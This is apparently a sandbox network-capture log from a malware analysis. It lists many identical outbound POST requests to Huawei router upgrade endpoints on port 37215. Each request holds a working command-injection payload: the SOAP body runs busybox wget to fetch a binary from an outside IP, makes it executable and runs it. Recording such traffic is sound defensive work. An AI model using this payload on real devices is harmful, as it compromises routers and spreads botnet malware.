                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              114192.168.2.1545372157.237.179.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035368919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              115192.168.2.1547954138.76.155.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035373926 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              116192.168.2.155672241.52.90.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035376072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              117192.168.2.1536592197.175.62.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035377026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              118192.168.2.1546578102.174.236.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035455942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              119192.168.2.1546414190.25.242.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035459995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              120192.168.2.1538366197.103.49.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035459995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              121192.168.2.1540802102.154.185.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035460949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              122192.168.2.154198641.226.230.20937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035494089 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              123192.168.2.154695645.226.49.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035537958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
